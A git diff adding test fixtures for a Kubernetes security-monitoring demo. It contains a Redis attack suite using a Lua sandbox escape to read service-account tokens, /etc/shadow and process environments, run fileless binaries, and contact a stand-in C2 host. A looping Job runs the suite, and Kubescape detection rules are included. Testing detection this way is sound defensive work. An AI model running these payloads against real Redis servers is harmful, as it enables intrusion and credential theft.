/dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml @@ -0,0 +1,377 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-attacks.yaml (Apache-2.0 licensed), wrapped as a ConfigMap so +# the bobctl-attack Job can mount it at /suite/redis-attacks.yaml. 
The bobctl +# CLI consumes this file via its --attack-suite flag (it is NOT a Kubernetes +# CRD, it is a bobctl-internal manifest). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: bob-suite-attack + namespace: redis +data: + redis-attacks.yaml: | + apiVersion: bobctl.k8sstormcenter.io/v1alpha1 + kind: AttackSuite + metadata: + name: redis-full-attack-suite + description: >- + Comprehensive Redis attack suite (12 attacks) targeting a vulnerable + Redis 7.2.10 instance with CVE-2022-0543 (Lua sandbox escape via + package.loadlib / io.popen). Each attack has inline expectedDetections + for precise per-attack alert attribution via the AlertLedger. + target: + service: redis + namespace: redis + port: 6379 + protocol: redis + + attacks: + # ─── Attack 1: Fileless Execution via memfd_create (R1005) ─────────────── + - name: fileless-memfd-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'" + local f = io_mod.popen(cmd) + if not f then return 'popen_failed' end + local out = f:read('*a') + f:close() + return 'fileless:' .. out + successIndicators: + - responseContains: "fileless:" + expectedDetections: + - attackType: fileless + ruleID: R1005 + ruleName: "Fileless execution detected" + containerName: redis + + # ─── Attack 2: SA Token Exfiltration (R0006) ──────────────────────────── + - name: sa-token-exfil + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo no_token') + local out = f:read('*a') + f:close() + return out + successIndicators: + - responseContains: "eyJ" + expectedDetections: + - attackType: fileless + ruleID: R0006 + ruleName: "Unexpected service account token access" + containerName: redis + command: cat + + # ─── Attack 3: Sensitive File Access /etc/shadow (R0010) ───────────────── + - name: read-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /etc/shadow 2>&1; echo shadow_attempted') + local out = f:read('*a') + f:close() + return 'shadow:' .. 
out + successIndicators: + - responseContains: "shadow_attempted" + expectedDetections: + - attackType: fileless + ruleID: R0010 + ruleName: "Unexpected Sensitive File Access" + containerName: redis + command: cat + + # ─── Attack 4: Unexpected Process - whoami (R0001) ─────────────────────── + - name: unexpected-process-whoami + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('whoami') + local out = f:read('*a') + f:close() + return 'user:' .. out + successIndicators: + - responseContains: "user:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: whoami + + # ─── Attack 5: DNS Anomaly - resolve evil domain (R0005) ───────────────── + - name: dns-anomaly-evil-domain + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts evil.attacker.example.com 2>&1 || echo dns_done') + local out = f:read('*a') + f:close() + return 'dns:' .. out + successIndicators: + - responseContains: "dns:" + expectedDetections: + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 6: Drifted Binary Execution (R1001) ───────────────────────── + - name: drifted-binary-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/ls /tmp/drifted_redis && /tmp/drifted_redis /etc 2>&1; rm -f /tmp/drifted_redis') + local out = f:read('*a') + f:close() + return 'drifted:' .. out + successIndicators: + - responseContains: "drifted:" + expectedDetections: + - attackType: fileless + ruleID: R1001 + ruleName: "Drifted process executed" + containerName: redis + command: drifted_redis + + # ─── Attack 7: Execution from /dev/shm (R1000) ────────────────────────── + - name: exec-from-devshm + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/echo /dev/shm/malicious && /dev/shm/malicious pwned 2>&1; rm -f /dev/shm/malicious') + local out = f:read('*a') + f:close() + return 'shm:' .. 
out + successIndicators: + - responseContains: "shm:" + expectedDetections: + - attackType: fileless + ruleID: R1000 + ruleName: "Process executed from malicious source" + containerName: redis + + # ─── Attack 8: Read /proc/*/environ (R0008) ───────────────────────────── + - name: read-proc-environ + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n" | head -3 || echo no_environ') + local out = f:read('*a') + f:close() + return 'environ:' .. out + successIndicators: + - responseContains: "environ:" + expectedDetections: + - attackType: fileless + ruleID: R0008 + ruleName: "Read Environment Variables from procfs" + containerName: redis + command: cat + + # ─── Attack 9: Symlink over /etc/shadow (R1010) ───────────────────────── + - name: symlink-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('ln -sf /etc/shadow /tmp/shadow_link 2>&1 && cat /tmp/shadow_link 2>/dev/null; rm -f /tmp/shadow_link') + local out = f:read('*a') + f:close() + return 'symlink:' .. out + successIndicators: + - responseContains: "symlink:" + expectedDetections: + - attackType: fileless + ruleID: R1010 + ruleName: "Soft link created over sensitive file" + containerName: redis + + # ─── Attack 10: Crypto Mining Domain DNS (R1008) ──────────────────────── + - name: crypto-mining-dns + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts xmr.pool.minergate.com 2>&1 || echo mining_dns_done') + local out = f:read('*a') + f:close() + return 'mining_dns:' .. out + successIndicators: + - responseContains: "mining_dns:" + expectedDetections: + - attackType: fileless + ruleID: R1008 + ruleName: "Crypto Mining Domain Communication" + containerName: redis + + # ─── Attack 11: Reverse Shell Attempt via Perl HTTP (R0001 + R0005) ───── + - name: reverse-shell-perl-http + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("perl -e 'use IO::Socket::INET;my $s=IO::Socket::INET->new(PeerAddr=>\"c2.evil.example.com\",PeerPort=>80,Timeout=>2);print defined $s ? \"connected\" : \"connect_failed\";' 2>&1; echo perl_http_done") + local out = f:read('*a') + f:close() + return 'revshell:' .. 
out + successIndicators: + - responseContains: "revshell:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: perl + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 12: Credential Harvesting via /etc/passwd + id (R0001) ────── + - name: credential-harvest-passwd + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("awk -F: '$3==0{print $1}' /etc/passwd && id 2>&1") + local out = f:read('*a') + f:close() + return 'creds:' .. out + successIndicators: + - responseContains: "creds:root" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: awk diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml new file mode 100644 index 00000000000..10635ccdc02 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml @@ -0,0 +1,153 @@ +# Job that runs bobctl in a tight loop to continuously execute the +# CVE-2025-49844 attack suite against the vulnerable redis deployment. The +# bobctl binary is downloaded at container startup by an init container, so +# no image build is needed. The attack suite YAML is mounted from the +# bob-suite-attack ConfigMap at /suite/redis-attacks.yaml. +# +# bobctl reaches the redis Service via kubectl-port-forward style: +# it queries the apiserver for the Service + a backing Pod, then opens a +# pods/portforward stream to that Pod. The dedicated ServiceAccount + +# Role below grant exactly the verbs required for that flow. +# +# The Job's pod must land in the `redis` namespace (same as the Redis +# Service and Kubescape ApplicationProfile) so the attack traffic is +# recorded against this namespace's profile. 
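+#
+# For debugging, the access the Role below grants can be exercised by hand
+# (a hedged equivalent of the flow bobctl drives through the apiserver;
+# <redis-pod> is a placeholder for whichever pod backs the Service):
+#
+#   kubectl -n redis get svc redis
+#   kubectl -n redis get pods
+#   kubectl -n redis port-forward pod/<redis-pod> 6379:6379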
+--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: bobctl + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +rules: + - apiGroups: [""] + resources: ["services", "pods"] + verbs: ["get", "list"] + - apiGroups: [""] + resources: ["pods/portforward"] + verbs: ["create", "get"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: bobctl-port-forward +subjects: + - kind: ServiceAccount + name: bobctl + namespace: redis +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: bobctl-attack + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +spec: + backoffLimit: 100 + ttlSecondsAfterFinished: 600 + template: + metadata: + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc + spec: + restartPolicy: OnFailure + serviceAccountName: bobctl + initContainers: + - name: fetch-bobctl + image: curlimages/curl:8.15.0 + command: + - sh + - -c + - | + set -euo pipefail + curl -fsSL -o /bob/bobctl \ + https://github.com/k8sstormcenter/bob/releases/latest/download/bobctl-linux-amd64 + chmod +x /bob/bobctl + volumeMounts: + - name: bob-bin + mountPath: /bob + containers: + - name: bobctl + image: alpine:3.19 + command: + - sh + - -c + - | + set -u + # bobctl's CLI bootstrap unconditionally tries to read + # ~/.kube/config (it uses kubectl-style proxy routing for + # service targets), so synthesize a minimal in-cluster + # kubeconfig from the pod's service-account mount before + # invoking it. tokenFile is preferred over inline token so + # SA-token rotation works. + mkdir -p /root/.kube + cat > /root/.kube/config <<'EOF' + apiVersion: v1 + kind: Config + clusters: + - name: in-cluster + cluster: + certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + server: https://kubernetes.default.svc + contexts: + - name: in-cluster + context: + cluster: in-cluster + user: in-cluster + namespace: redis + current-context: in-cluster + users: + - name: in-cluster + user: + tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token + EOF + # Small gap lets the service DNS entry propagate in very fresh namespaces. 
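+          # (If the fixed delay proves flaky, a hedged alternative is to poll
+          #  DNS instead -- busybox nslookup ships in the alpine base image:
+          #    until nslookup redis.redis.svc >/dev/null 2>&1; do sleep 1; done
+          #  )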
+ sleep 5 + while true; do + /bob/bobctl attack \ + --attack-suite /suite/redis-attacks.yaml \ + -n redis --format json || true + sleep 5 + done + volumeMounts: + - name: bob-bin + mountPath: /bob + readOnly: true + - name: bob-suite + mountPath: /suite + readOnly: true + resources: + requests: + cpu: 100m + memory: 64Mi + limits: + cpu: 500m + memory: 256Mi + volumes: + - name: bob-bin + emptyDir: {} + - name: bob-suite + configMap: + name: bob-suite-attack diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md new file mode 100644 index 00000000000..4ee6abddd9f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md @@ -0,0 +1,77 @@ +# Helm-rendered Kubescape + Vector manifests for the sovereign-soc suite + +`PrerenderedDeploy` only applies static YAML; it does not invoke helm at +runtime. So the Kubescape and Vector charts used by the Sovereign SOC demo +are pre-rendered once and committed here. The source values files that +went in are also committed so the render is reproducible. + +Sources: + +- `kubescape-values.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/values.yaml). +- `kubescape-default-rules.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/default-rules.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/default-rules.yaml). +- `vector-values.yaml` — based on + [`k8sstormcenter/soc@main:tree/vector-lab/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/vector-lab/values.yaml) + with the ClickHouse sink `endpoint:` rewritten to the external forensic + endpoint (`http://clickhouse.forensic.austrianopencloudcommunity.org:8123`) + so Vector can write to CH from any experiment cluster, not just the + forensic cluster's in-cluster DNS. + +## How to re-render + +From inside the dev docker container, with its helm in `$PATH`: + +```sh +helm repo add kubescape https://kubescape.github.io/helm-charts/ +helm repo add vector https://helm.vector.dev +helm repo update + +# Kubescape operator (pinned to the version used by soc/Makefile). +helm template kubescape kubescape/kubescape-operator \ + --version 1.30.2 \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml + +# Split the kube-system-namespaced RoleBinding (storage-auth-reader) into +# its own file, because PrerenderedDeploy only tolerates a single namespace +# per step. +python3 - <<'PY' +import yaml, os +base = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered" +with open(f"{base}/kubescape.rendered.yaml") as f: + docs = list(yaml.safe_load_all(f)) +main, ks = [], [] +for d in docs: + if d is None: continue + ns = (d.get("metadata") or {}).get("namespace") + (ks if ns == "kube-system" else main).append(d) +with open(f"{base}/kubescape.rendered.yaml", "w") as f: + yaml.safe_dump_all(main, f, sort_keys=False) +with open(f"{base}/kubescape.rendered.kube-system.yaml", "w") as f: + yaml.safe_dump_all(ks, f, sort_keys=False) +PY + +# Vector (version pinned to whatever's current on the vector repo). 
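+# (If this render also needs to be reproducible, pin it: discover the current
+#  chart version first, then pass `--version <chart-version>` to the command
+#  below; <chart-version> is a placeholder for whichever version you pick.)
+helm search repo vector/vector --versions | head -n 5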
+helm template vector vector/vector \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml +``` + +## Why the kube-system split + +The kubescape-operator chart includes a single `RoleBinding` in +`kube-system` — `storage-auth-reader` — that delegates auth checking to +the kube-apiserver's `extension-apiserver-authentication-reader` Role +(required for the storage APIService aggregation to work; without it the +`ApplicationProfile` CRD can't be read, which means node-agent can't +compare workload behavior against the pre-populated redis profile). + +`RoleBinding` objects must reside in the same namespace as the Role they +reference, so we can't rewrite it into `honey`. And +`PrerenderedDeploy.getNamespace()` errors if a single concatenated YAML +touches more than one namespace. We split it into its own step and flag +it `skip_namespace_delete: true` on the proto spec so teardown never +tries to `kubectl delete ns kube-system`. diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml new file mode 100644 index 00000000000..349c704f8a6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml @@ -0,0 +1,746 @@ +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey +spec: + rules: + - description: Detects unexpected process launches that are not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected process launched: ' + event.comm + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + id: R0001 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Unexpected process launched + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - process + - exec + - applicationprofile + - description: Detects unexpected file access that is not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected file access detected: ' + event.comm + ' with PID ' + + string(event.pid) + ' to ' + event.path + ruleExpression: + - eventType: open + expression: >- + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0002 + isTriggerAlert: true + mitreTactic: TA0009 + mitreTechnique: T1005 + name: Files Access Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: true + tags: + - anomaly + - file + - open + - applicationprofile + - description: >- + Detects unexpected system calls that are not whitelisted by application + profile + enabled: false + expressions: + message: >- + 'Unexpected system call detected: ' + event.syscallName + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + uniqueId: event.syscallName + id: R0003 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Syscalls Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - syscall + - applicationprofile + - description: >- + Detects unexpected 
capabilities that are not whitelisted by application + profile + enabled: true + expressions: + message: >- + 'Unexpected capability used: ' + event.capName + ' in syscall ' + + event.syscallName + ' with PID ' + string(event.pid) + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + uniqueId: event.comm + '_' + event.capName + id: R0004 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Linux Capabilities Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - capabilities + - applicationprofile + - description: >- + Detecting unexpected domain requests that are not whitelisted by + application profile. + enabled: true + expressions: + message: >- + 'Unexpected domain communication: ' + event.name + ' from: ' + + event.containerName + ruleExpression: + - eventType: dns + expression: >- + !event.name.endsWith('.svc.cluster.local.') && + !nn.is_domain_in_egress(event.containerId, event.name) + uniqueId: event.comm + '_' + event.name + id: R0005 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: DNS Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - dns + - anomaly + - networkprofile + - description: Detecting unexpected access to service account token. + enabled: true + expressions: + message: >- + 'Unexpected access to service account token: ' + event.path + ' with + flags: ' + event.flags.join(',') + ruleExpression: + - eventType: open + expression: > + ((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount') + && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token'))) && + !ap.was_path_opened_with_suffix(event.containerId, '/token') + uniqueId: event.comm + id: R0006 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + name: Unexpected service account token access + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - serviceaccount + - applicationprofile + - description: Detecting execution of kubernetes client + enabled: true + expressions: + message: >- + eventType == 'exec' ? 'Kubernetes client (' + event.comm + ') was + executed with PID ' + string(event.pid) : 'Network connection to + Kubernetes API server from container ' + event.containerName + ruleExpression: + - eventType: exec + expression: >- + (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && + k8s.is_api_server_address(event.dstAddr) && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: >- + eventType == 'exec' ? 'exec_' + event.comm : 'network_' + + event.dstAddr + id: R0007 + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + name: Workload uses Kubernetes API unexpectedly + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - exec + - network + - anomaly + - applicationprofile + - description: Detecting reading environment variables from procfs. 
+ enabled: true + expressions: + message: >- + 'Reading environment variables from procfs: ' + event.path + ' by + process ' + event.comm + ruleExpression: + - eventType: open + expression: > + event.path.startsWith('/proc/') && + event.path.endsWith('/environ') && + !ap.was_path_opened_with_suffix(event.containerId, '/environ') + uniqueId: event.comm + '_' + event.path + id: R0008 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + name: Read Environment Variables from procfs + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - procfs + - environment + - applicationprofile + - description: Detecting eBPF program load. + enabled: true + expressions: + message: >- + 'bpf program load system call (bpf) was called by process (' + + event.comm + ') with command (BPF_PROG_LOAD)' + ruleExpression: + - eventType: bpf + expression: >- + event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + id: R0009 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + name: eBPF Program Load + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - bpf + - ebpf + - applicationprofile + - description: Detecting access to sensitive files. + enabled: true + expressions: + message: >- + 'Unexpected sensitive file access: ' + event.path + ' by process ' + + event.comm + ruleExpression: + - eventType: open + expression: >- + event.path.startsWith('/etc/shadow') && + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Unexpected Sensitive File Access + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - files + - anomaly + - applicationprofile + - description: >- + Detecting unexpected egress network traffic that is not whitelisted by + application profile. 
+ enabled: false + expressions: + message: >- + 'Unexpected egress network communication to: ' + event.dstAddr + ':' + + string(event.dstPort) + ' using ' + event.proto + ' from: ' + + event.containerName + ruleExpression: + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + id: R0011 + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + name: Unexpected Egress Network Traffic + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - whitelisted + - network + - anomaly + - networkprofile + - description: 'Detecting exec calls that are from malicious source like: /dev/shm' + enabled: true + expressions: + message: >- + 'Execution from malicious source: ' + event.exepath + ' in directory ' + + event.cwd + ruleExpression: + - eventType: exec + expression: > + (event.exepath == '/dev/shm' || + event.exepath.startsWith('/dev/shm/')) || (event.cwd == '/dev/shm' + || event.cwd.startsWith('/dev/shm/') || + (parse.get_exec_path(event.args, + event.comm).startsWith('/dev/shm/'))) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1000 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from malicious source + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - exec + - signature + - malicious + - description: Detecting exec calls of binaries that are not included in the base image + enabled: true + expressions: + message: >- + 'Process (' + event.comm + ') was executed and is not part of the + image' + ruleExpression: + - eventType: exec + expression: > + (event.upperlayer == true || + event.pupperlayer == true) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1001 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + name: Drifted process executed + profileDependency: 1 + severity: 8 + supportPolicy: false + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - description: Detecting Kernel Module Load. 
+ enabled: true + expressions: + message: >- + 'Kernel module (' + event.module + ') loading attempt with syscall (' + + event.syscallName + ') was called by process (' + event.comm + ')' + ruleExpression: + - eventType: kmod + expression: >- + event.syscallName == 'init_module' || event.syscallName == + 'finit_module' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + id: R1002 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + name: Process tries to load a kernel module + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - kmod + - kernel + - module + - load + - description: Detecting ssh connection to disallowed port + enabled: false + expressions: + message: >- + 'Malicious SSH connection attempt to ' + event.dstIp + ':' + + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: >- + dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && + !nn.was_address_in_egress(event.containerId, event.dstIp) + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + id: R1003 + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + name: Disallowed ssh connection + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - description: Detecting exec calls from mounted paths. + enabled: true + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) && + k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) + || parse.get_exec_path(event.args, event.comm).startsWith(mount)) + uniqueId: event.comm + id: R1004 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from mount + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - exec + - mount + - applicationprofile + - description: Detecting Fileless Execution + enabled: true + expressions: + message: >- + 'Fileless execution detected: exec call "' + event.comm + '" is from a + malicious source' + ruleExpression: + - eventType: exec + expression: >- + event.exepath.contains('memfd') || + event.exepath.startsWith('/proc/self/fd') || + event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1005 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + name: Fileless execution detected + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - fileless + - execution + - malicious + - description: >- + Detecting Unshare System Call usage, which can be used to escape + container. + enabled: true + expressions: + message: >- + 'Unshare system call (unshare) was called by process (' + event.comm + + ')' + ruleExpression: + - eventType: unshare + expression: >- + event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + uniqueId: event.comm + '_' + 'unshare' + id: R1006 + 